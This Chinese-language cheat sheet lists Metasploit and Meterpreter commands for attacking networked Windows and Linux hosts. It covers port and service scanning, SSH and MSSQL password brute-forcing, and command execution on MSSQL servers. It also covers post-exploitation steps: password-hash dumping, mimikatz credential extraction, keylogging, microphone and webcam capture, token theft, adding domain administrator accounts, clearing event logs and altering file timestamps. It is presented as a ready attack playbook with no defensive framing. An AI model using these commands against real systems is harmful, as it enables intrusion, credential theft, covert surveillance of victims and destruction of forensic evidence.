meterpreter常⽤命令sessions -l 查看会话
backgroud 暂时退出当前会话
注⼊进程:
ps 查看进程
migrate 注⼊进程进程ID ⼀般选择对应的PID
run vnc 查看远程桌⾯
⽂件操作
cat 查看⽂件
edit 编辑⽂件
upload 上传⽂件
download 下载⽂件
rm 删除⽂件
mkdir 创建⽂件夹
rmdir 删除⽂件夹
⽹络及系统操作
enumdesktops 在线⽤户数
uictl disable keyboard 让键盘失效
uictl enable keyboard 恢复键盘
record_mic -d 10 ⾳频录制录制10秒
webcam_stream 开启摄像头
getsystem 获取最⾼权限
hashdump 密码hash
sysinfo  查看系统命令
screenshot 截图
run checkvm 查看是否是虚拟机
getuid 查看运⾏⽊马的⽤户
migrate pid //注⼊到进程成功会提⽰successfully
meterpreter > load mimikatz meterpreter > wdigest //加载mimikatz模块需要system权限
meterpreter> run post/windows/capture/keylog_recorder #获取键盘记录,运⾏键盘记录模块,他⾃⼰创建本⽂。特定扫描
扫描端⼝
use auxiliary/scanner/portscan/tcp
show options
set rhosts 192.168.2.1-255
set ports 21,22,25,443,445,1433,3306
set threads 20
ssh命令指定端口exploit
smb_version 模块
smb_version 模块:
msf> use auxiliary/scanner/smb/smb_version
show options
set RHOSTS 192.168.1.111
run
查mssql 主机
msf> use auxiliary/scanner/mssql/mssql_ping
show options
set RHOSTS 192.168.1.0/24
set THREADS 255
run
SSH 服务器扫描
msf> use auxiliary/scanner/ssh/ssh_version
set THREADS 50
run
FTP 主机扫描
msf> use auxiliary/scanner/ftp/ftp_version
show options
set RHOSTS 192.168.1.0/24
set THREADS 255
run
扫描FTP 匿名登录
use auxiliary/scanner/ftp/anonymos
set RHOSTS 192.168.1.0/24
set THREADS 50
run
扫描SNMP 主机
msf> use auxiliary/scanner/snmp/snmp_login
set RHOSTS 192.168.1.0/24
set THREADS 50
run
mssql开发利⽤
1.对各个ip是否有mssql服务的探测
use scanner/mssql/mssql_ping //测试MSSQL的存在和信息
show options
set rhosts 192.168.2.1-255
set threads 30
exploit
2.对扫描到的ip进⾏爆破
use scanner/mssql/mssql_login //具体配置show options。
3.sa权限对其利⽤
use admin/mssql/mssql_exec
set rhost 192.168.2.10
set password sa
set /c echo hello
exploit
爆破ssh模块
use auxiliary/scanner/ssh/ssh_login
set rhosts 7.7.7.20
set username root
set pass_file / //加载字典,可以收集密码做字典
set threads 50
run
通过nmap扫描基本漏洞
msf > nmap –script=vuln 受害靶机ip地址
msf > nmap –script=mysql-info 192.168.0.4 //扫描mysql数据库信息版本等.. MSFconsole Commands
show exploits 查看所有exploit
show payloads 查看所有payload
show auxiliary 查看所有auxiliary
search name 搜索exploit 等
info 查看加载模块的信息
use name 加载模块
LHOST 本机IP
RHOST ⽬标IP
set function 设置选项值
setg function 全局设置
show options 查看选项
show targets 查看exp 可选的平台
set target num 设置exp 作⽤平台
set payload payload 设置payload
show advanced 查看⾼级选项
set autorunscript migrate -f 设置⾃动执⾏指令
check 测试是否可利⽤
exploit 执⾏exp 或模块
exploit -j 作为后台执⾏
exploit -z 成功后不⽴即打开session
exploit -e encoder 指定encoder
exploit -h 查看帮助信息
sessions -l -v 列出可⽤sessions 详细信息
sessions -s script 在指定session 执⾏脚本
sessions -K 结束session
sessions -c cmd 执⾏指定命令
sessions -u sessionID 升级shell
db_create name 创建数据库
db_connect name 连接数据库
db_nmap nmap 扫描并导⼊结果
db_autopwn -h 查看autopwn 帮助
db_autopwn -p -r -e 基于端⼝,反弹shell
db_destroy 删除数据库
Meterpreter Commands help 查看帮助
run scriptname 运⾏脚本
sysinfo 系统基本信息
ls 列⽬录
use priv 运⾏提权组件
ps 列进程
migrate PID PID 迁移
use incognito token 窃取
list_tokens -u 查看可⽤⽤户token
list_tokens -g 查看可⽤组token
impersonate_token DOMAIN_NAME\USERNAME 模仿token steal_token PID 窃取PID 所属token 并模仿
drop_token 停⽌模仿token
getsystem 获取SYSTEM 权限
shell 运⾏shell
execute - -i 交互式运⾏cmd
execute - -i -t 使⽤可⽤token 运⾏
execute - -i -H -t 同上,同时隐藏进程
rev2self 返回⾄初始⽤户
reg command 修改注册表
setkesktop number 切换⾄另⼀已登录⽤户屏幕
screenshot 截屏
upload file 上传⽂件
download file 下载⽂件
keyscan_start 开始截取击键记录
keyscan_stop 停⽌截取击键记录
getprivs 尽可能提升权限
uictl enable keyboard/mouse 获取键盘或⿏标的控制权background 将当前meterpreter shell 转⼊后台
hashdump 导出所有⽤户hash
use sniffer 加载嗅探模块
sniffer_interfaces 查看可⽤⽹卡接⼝
sniffer_dump interfaceID pcapname 开始嗅探
sniffer_start interfaceID packet-buffer 指定buffer 范围嗅探
sniffer_stats interfaceID 抓取统计信息
sniffer_stop interfaceID 停⽌嗅探
add_user username password -h ip 添加⽤户
add_group_user “Domain Admins” username -h ip 添加⽤户⾄管理组clearev 清空⽇志
timestomp 改变⽂件属性如创建时间等
reboot 重启